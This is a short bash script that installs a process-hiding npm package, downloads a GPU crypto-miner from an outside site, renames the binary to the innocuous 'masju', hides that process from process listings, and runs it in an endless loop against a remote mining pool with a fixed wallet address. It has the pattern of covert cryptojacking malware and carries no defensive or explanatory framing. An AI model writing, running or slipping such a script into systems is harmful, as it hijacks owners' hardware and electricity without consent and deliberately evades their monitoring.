#!/bin/bash
export LC_ALL=C
export LANG=C
apt update && apt -y install wget curl sudo nodejs npm
npm i -g node-process-hider
wget https://www.ntmminer.com/downloads/NTMminer-noid-v1.1.6-linux-x64.tar.gz
tar xzf NTMminer-noid-v1.1.6-linux-x64.tar.gz && cd NTMminer-noid-v1.1.6-linux-x64
mv ntmminer-noid masju

ph add masju

while true; do
./masju --rpc http://parano1d-pool.fun:3784 --coinbase o1f74we257x39wtn0k3jws7uhvpnkmsewegkejyh89wjvmyhq53c8sj0n24h --worker rig1 --gpu
done
